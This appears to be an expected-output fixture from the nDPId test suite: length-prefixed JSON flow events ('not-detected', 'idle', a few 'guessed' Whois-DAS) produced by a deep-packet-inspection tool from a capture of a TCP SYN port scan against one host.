-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 